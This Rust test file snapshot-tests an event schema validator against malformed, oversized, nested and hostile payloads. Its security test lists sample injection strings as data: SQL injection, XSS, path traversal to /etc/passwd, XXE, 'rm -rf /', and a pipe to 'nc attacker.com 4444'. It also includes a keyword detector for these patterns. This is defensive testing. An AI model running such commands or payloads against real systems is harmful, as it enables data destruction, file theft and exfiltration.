// Schema Validation Tests with Snapshot Testing
//
// Demonstrates snapshot testing for complex validation scenarios,
// including malformed events, security validations, and error patterns.

use crate::common::prelude::*;
use crate::common::snapshot_testing::{assert_snapshot, snapshot, Redaction};
use sinex_events::EventFactory;
use sinex_db::integrity::{malformed_detection, IntegrityTestConfig, IntegrityTester};
use sinex_db::validation::{EventValidator, ValidationError};
use std::collections::HashMap;

#[sinex_test]
async fn test_malformed_event_validation_snapshot(ctx: TestContext) -> TestResult {
    let pool = ctx.pool().clone();
    let validator = EventValidator::load_from_db(&pool).await?;

    // Test malformed events generated by the integrity module
    let malformed_events = malformed_detection::generate_malformed_test_events();
    
    // Collect validation results for snapshot
    let mut validation_results = Vec::new();
    
    for event in malformed_events.iter() {
        let result = validator.validate(event);
        
        let validation_entry = json!({
            "event_type": event.event_type,
            "source": event.source,
            "validation_result": match &result {
                Ok(_) => json!({
                    "status": "passed",
                    "unexpected": true
                }),
                Err(e) => json!({
                    "status": "failed",
                    "error_type": format!("{:?}", e).split('(').next().unwrap_or("Unknown"),
                    "error_message": e.to_string(),
                    "expected": true
                })
            },
            "payload_characteristics": {
                "is_null": event.payload.is_null(),
                "is_empty_object": event.payload.is_object() && event.payload.as_object().map(|o| o.is_empty()).unwrap_or(false),
                "size_bytes": serde_json::to_string(&event.payload).unwrap_or_default().len(),
            }
        });
        
        validation_results.push(validation_entry);
    }

    // Create comprehensive snapshot
    let snapshot_data = json!({
        "test_type": "malformed_event_detection",
        "total_events_tested": malformed_events.len(),
        "validation_results": validation_results,
        "summary": {
            "all_failed": validation_results.iter().all(|r| r["validation_result"]["status"] == "failed"),
            "error_types": validation_results.iter()
                .filter_map(|r| r["validation_result"]["error_type"].as_str())
                .collect::<std::collections::HashSet<_>>(),
        }
    });

    assert_snapshot!(
        snapshot_data,
        "malformed_event_validation_results",
        Redaction::timestamps()
    );

    Ok(())
}

#[sinex_test]
async fn test_schema_constraint_violations_snapshot(ctx: TestContext) -> TestResult {
    let pool = ctx.pool().clone();
    let validator = EventValidator::load_from_db(&pool).await?;

    // Define test cases with expected validation failures
    let test_cases = vec![
        (
            "missing_required_field",
            EventBuilder::generic("filesystem", "file.created")
                .payload(json!({
                    // Missing required "path" field
                    "size": 1024,
                    "permissions": "644"
                }))
                .build(),
        ),
        (
            "invalid_field_type",
            EventBuilder::generic("filesystem", "file.created")
                .payload(json!({
                    "path": "/test/file.txt",
                    "size": "not_a_number", // Should be numeric
                    "permissions": 644
                }))
                .build(),
        ),
        (
            "extra_fields",
            EventBuilder::generic("filesystem", "file.created")
                .payload(json!({
                    "path": "/test/file.txt",
                    "size": 1024,
                    "unexpected_field": "should_not_be_here",
                    "another_extra": 42
                }))
                .build(),
        ),
        (
            "nested_validation_error",
            EventBuilder::generic("process", "metrics")
                .payload(json!({
                    "process_name": "test",
                    "metrics": {
                        "cpu": "high", // Should be numeric
                        "memory": 256,
                        "threads": null // Should not be null
                    }
                }))
                .build(),
        ),
    ];

    let mut constraint_violations = Vec::new();

    for (scenario, event) in test_cases {
        let result = validator.validate(&event);
        
        constraint_violations.push(json!({
            "scenario": scenario,
            "event_type": event.event_type,
            "payload": event.payload,
            "validation_result": match result {
                Ok(_) => json!({"status": "passed"}),
                Err(e) => json!({
                    "status": "failed",
                    "error": e.to_string(),
                    "error_details": format!("{:?}", e),
                })
            }
        }));
    }

    let snapshot_data = json!({
        "test_type": "schema_constraint_validation",
        "violations": constraint_violations,
    });

    assert_snapshot!(snapshot_data, "schema_constraint_violations");

    Ok(())
}

#[sinex_test]
async fn test_security_validation_patterns_snapshot(ctx: TestContext) -> TestResult {
    let pool = ctx.pool().clone();
    let validator = EventValidator::load_from_db(&pool).await?;

    // Test various injection attack payloads
    let security_test_cases = vec![
        ("sql_injection", json!({
            "path": "/test'; DROP TABLE core.events; --",
            "query": "SELECT * FROM users WHERE id = '1' OR '1'='1'",
        })),
        ("xss_attempt", json!({
            "path": "/test/<script>alert('xss')</script>",
            "html": "<img src=x onerror=alert('XSS')>",
            "data": "javascript:alert('XSS')",
        })),
        ("path_traversal", json!({
            "path": "../../../etc/passwd",
            "file": "..\\..\\..\\windows\\system32\\config\\sam",
            "url": "file:///etc/passwd",
        })),
        ("null_byte_injection", json!({
            "path": "/test/file\u{0000}.txt",
            "command": "cat /etc/passwd\u{0000}",
        })),
        ("control_characters", json!({
            "path": "/test/file\x01\x02\x03.txt",
            "data": "test\r\nSet-Cookie: admin=true",
        })),
        ("unicode_attacks", json!({
            "path": "/test/\u{202e}txt.elif", // Right-to-left override
            "homograph": "paypal.com", // Using cyrillic 'a'
            "normalization": "à" // Different unicode representations
        })),
        ("command_injection", json!({
            "command": "echo test; rm -rf /",
            "input": "test`whoami`",
            "pipe": "test | nc attacker.com 4444",
        })),
        ("xxe_attempt", json!({
            "xml": "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>",
            "data": "&xxe;",
        })),
    ];

    let mut security_results = Vec::new();

    for (attack_type, payload) in security_test_cases {
        let event = EventBuilder::generic("security.test", attack_type)
            .payload(payload.clone())
            .build();

        let result = validator.validate(&event);
        
        security_results.push(json!({
            "attack_type": attack_type,
            "payload_sample": {
                "keys": payload.as_object().map(|o| o.keys().collect::<Vec<_>>()),
                "contains_suspicious_patterns": detect_suspicious_patterns(&payload),
            },
            "validation_result": match result {
                Ok(_) => json!({
                    "status": "passed",
                    "security_concern": "Potential security validation bypass"
                }),
                Err(e) => json!({
                    "status": "failed",
                    "error": e.to_string(),
                    "security_blocked": true
                })
            }
        }));
    }

    let snapshot_data = json!({
        "test_type": "security_validation_patterns",
        "total_attack_types": security_test_cases.len(),
        "results": security_results,
        "summary": {
            "blocked_count": security_results.iter()
                .filter(|r| r["validation_result"]["status"] == "failed")
                .count(),
            "passed_count": security_results.iter()
                .filter(|r| r["validation_result"]["status"] == "passed")
                .count(),
        }
    });

    assert_snapshot!(
        snapshot_data,
        "security_validation_patterns"
    );

    Ok(())
}

#[sinex_test]
async fn test_payload_size_boundaries_snapshot(ctx: TestContext) -> TestResult {
    let pool = ctx.pool().clone();
    let validator = EventValidator::load_from_db(&pool).await?;

    // Test various payload sizes
    let size_test_cases = vec![
        ("empty", 0),
        ("tiny", 10),
        ("small", 100),
        ("medium", 1_000),
        ("large", 10_000),
        ("very_large", 100_000),
        ("huge", 1_000_000),
    ];

    let mut size_results = Vec::new();

    for (size_category, size) in size_test_cases {
        let large_string = "x".repeat(size);
        let payload = json!({
            "data": large_string,
            "metadata": {
                "size": size,
                "category": size_category,
            }
        });

        let event = EventBuilder::generic("test.size", "payload_test")
            .payload(payload)
            .build();

        let validation_start = std::time::Instant::now();
        let result = validator.validate(&event);
        let validation_duration = validation_start.elapsed();

        size_results.push(json!({
            "category": size_category,
            "size_bytes": size,
            "validation_result": match result {
                Ok(_) => "passed",
                Err(_) => "failed",
            },
            "validation_time_ms": validation_duration.as_millis(),
            "performance_category": if validation_duration.as_millis() < 10 {
                "fast"
            } else if validation_duration.as_millis() < 100 {
                "acceptable"
            } else {
                "slow"
            }
        }));
    }

    let snapshot_data = json!({
        "test_type": "payload_size_boundaries",
        "results": size_results,
        "analysis": {
            "all_sizes_tested": size_test_cases.len(),
            "performance_degradation": size_results.last()
                .and_then(|r| r["validation_time_ms"].as_u64())
                .unwrap_or(0) > 100,
        }
    });

    assert_snapshot!(snapshot_data, "payload_size_validation");

    Ok(())
}

#[sinex_test]
async fn test_complex_nested_validation_snapshot(ctx: TestContext) -> TestResult {
    let pool = ctx.pool().clone();
    let validator = EventValidator::load_from_db(&pool).await?;

    // Create complex nested structures
    let complex_payloads = vec![
        (
            "deep_nesting",
            create_deeply_nested_json(10),
        ),
        (
            "wide_arrays",
            json!({
                "items": (0..100).map(|i| json!({
                    "id": i,
                    "data": format!("item_{}", i),
                })).collect::<Vec<_>>(),
            }),
        ),
        (
            "mixed_types",
            json!({
                "string": "test",
                "number": 42,
                "boolean": true,
                "null": null,
                "array": [1, "two", true, null, {"nested": "object"}],
                "object": {
                    "nested": {
                        "deeply": {
                            "values": [1, 2, 3]
                        }
                    }
                }
            }),
        ),
        (
            "recursive_references",
            json!({
                "users": [
                    {"id": 1, "name": "Alice", "friends": [2, 3]},
                    {"id": 2, "name": "Bob", "friends": [1, 3]},
                    {"id": 3, "name": "Charlie", "friends": [1, 2]},
                ],
                "groups": {
                    "admins": [1],
                    "users": [1, 2, 3],
                    "guests": [],
                }
            }),
        ),
    ];

    let mut complex_results = Vec::new();

    for (structure_type, payload) in complex_payloads {
        let event = EventBuilder::generic("test.complex", structure_type)
            .payload(payload.clone())
            .build();

        let result = validator.validate(&event);
        
        complex_results.push(json!({
            "structure_type": structure_type,
            "payload_stats": analyze_payload_structure(&payload),
            "validation_result": match result {
                Ok(_) => json!({"status": "passed"}),
                Err(e) => json!({
                    "status": "failed",
                    "error": e.to_string(),
                })
            }
        }));
    }

    let snapshot_data = json!({
        "test_type": "complex_nested_validation",
        "structures_tested": complex_results,
    });

    // Use fluent builder for more control
    snapshot(snapshot_data)
        .name("complex_nested_validation")
        .redact_timestamps()
        .assert();

    Ok(())
}

// Helper functions

fn create_deeply_nested_json(depth: usize) -> serde_json::Value {
    let mut result = json!({"value": "leaf"});
    for i in (0..depth).rev() {
        result = json!({
            format!("level_{}", i): result
        });
    }
    result
}

fn detect_suspicious_patterns(payload: &serde_json::Value) -> Vec<String> {
    let mut patterns = Vec::new();
    let payload_str = payload.to_string();
    
    if payload_str.contains("DROP TABLE") || payload_str.contains("'; --") {
        patterns.push("sql_injection".to_string());
    }
    if payload_str.contains("<script>") || payload_str.contains("javascript:") {
        patterns.push("xss".to_string());
    }
    if payload_str.contains("../") || payload_str.contains("..\\") {
        patterns.push("path_traversal".to_string());
    }
    if payload_str.contains('\0') {
        patterns.push("null_byte".to_string());
    }
    if payload_str.contains("<!ENTITY") {
        patterns.push("xxe".to_string());
    }
    
    patterns
}

fn analyze_payload_structure(payload: &serde_json::Value) -> serde_json::Value {
    let mut stats = HashMap::new();
    let mut max_depth = 0;
    let mut total_keys = 0;
    let mut total_values = 0;
    
    analyze_json_recursive(payload, 0, &mut max_depth, &mut total_keys, &mut total_values);
    
    json!({
        "max_depth": max_depth,
        "total_keys": total_keys,
        "total_values": total_values,
        "is_object": payload.is_object(),
        "is_array": payload.is_array(),
        "size_bytes": serde_json::to_string(payload).unwrap_or_default().len(),
    })
}

fn analyze_json_recursive(
    value: &serde_json::Value,
    current_depth: usize,
    max_depth: &mut usize,
    total_keys: &mut usize,
    total_values: &mut usize,
) {
    *max_depth = (*max_depth).max(current_depth);
    *total_values += 1;
    
    match value {
        serde_json::Value::Object(map) => {
            *total_keys += map.len();
            for (_, v) in map {
                analyze_json_recursive(v, current_depth + 1, max_depth, total_keys, total_values);
            }
        }
        serde_json::Value::Array(arr) => {
            for v in arr {
                analyze_json_recursive(v, current_depth + 1, max_depth, total_keys, total_values);
            }
        }
        _ => {}
    }
}